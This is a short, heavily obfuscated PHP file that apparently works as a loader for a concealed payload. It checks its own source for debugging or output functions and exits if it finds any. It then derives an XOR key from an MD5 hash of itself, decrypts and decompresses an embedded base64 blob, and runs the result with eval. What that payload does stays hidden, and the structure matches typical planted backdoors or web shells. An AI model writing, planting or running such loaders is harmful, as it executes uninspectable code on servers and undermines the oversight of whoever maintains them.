<?php
$rcwilgu="b781b72b8b331006d4181acaa3d248a4";
$mginxhnmdjp="5a075c06040f015201530601540806015606070b05055502070b0253575e5607";
$ckgysfpokn="laa1WcUII3VG9IeGj9b1sXZnaYkVmSKopiwgCg8N2+Pe3w+k9px6PJ37Pj2EwLj4N9OaqOHim7wUHqKOxGCjboziSgscPXxP4WqNpZC8i3aTxFI1Hmb7kGtyrW8Ij+bbW9AXFZa8uTplCCxvf13+vmTgSRMDfUmjSZvbTXfWZXrfQrqWhdQwG+bVSYc5xtQmkkqftas7oP8vvdOvGm/tMMn9fuz8ARlDZ6KBP/NhKq1rF0FzP8/d26TfmgsoXYQW6ZE2hbjP/qnKCjALamoD3Y22Q9Brvb2emg9XJ4vVdrL1TLFYHYsdXk1AAMpQjAcyTJmYvPuS639sorHrNwwA6rEXSEm4cC/Bug97cSLj3ob1RxdlVwkyYQfHCKYUFxvV+qgpH/kdlETO+VZmyK5VqdPEslcUigJ/VGscUJJHWZOZLRmQRQjOKMKpDi+qq2WpNdQHnbHANGvDJpXs8+rnp8oBiXmLszIZyiKjoKrC+UjItuctQUxSrY8KxhJsyWfAnydJ34uUwzGHu+qYFWlOVKsxa7b78QeV3sf4KqBiGU/aevz2ETAs8qtI8uEavQIamXiK+Pp0zFqHWXkhfhoMkb41PSeYOg==";
$gallczrtkt=file_get_contents(__FILE__);
$durxmqtleh=str_replace($ckgysfpokn,"",$gallczrtkt);
if(strpos($durxmqtleh,"ec"."ho")!==false||strpos($durxmqtleh,"pr"."int")!==false||strpos($durxmqtleh,"var_"."dump")!==false||strpos($durxmqtleh,"file_put_"."contents")!==false||strpos($durxmqtleh,"fw"."rite")!==false){die();}
$dotufsbl=str_replace(array($rcwilgu,$mginxhnmdjp),array("SP_777420e9","KP_cd25b0aa"),$gallczrtkt);
$ksgnrhgf=md5($dotufsbl);
$wktotxbopwkb=hex2bin($mginxhnmdjp);
$lpfbqax="";
$zpvtvqyb=strlen($ksgnrhgf);
for($odrzoxqjux=0;$odrzoxqjux<$zpvtvqyb;$odrzoxqjux++){
    $lpfbqax.=chr(ord($wktotxbopwkb[$odrzoxqjux])^ord($ksgnrhgf[$odrzoxqjux]));
}
$jkurqfaiig=base64_decode($ckgysfpokn);
$dzbydwausn=strlen($jkurqfaiig);
$vfyxal="";
$eizmorohbhm=strlen($lpfbqax);
for($odrzoxqjux=0;$odrzoxqjux<$dzbydwausn;$odrzoxqjux++){
    $vfyxal.=$jkurqfaiig[$odrzoxqjux]^$lpfbqax[$odrzoxqjux%$eizmorohbhm];
}
$izalaj="gz"."in"."fl"."ate";
eval($izalaj($vfyxal));
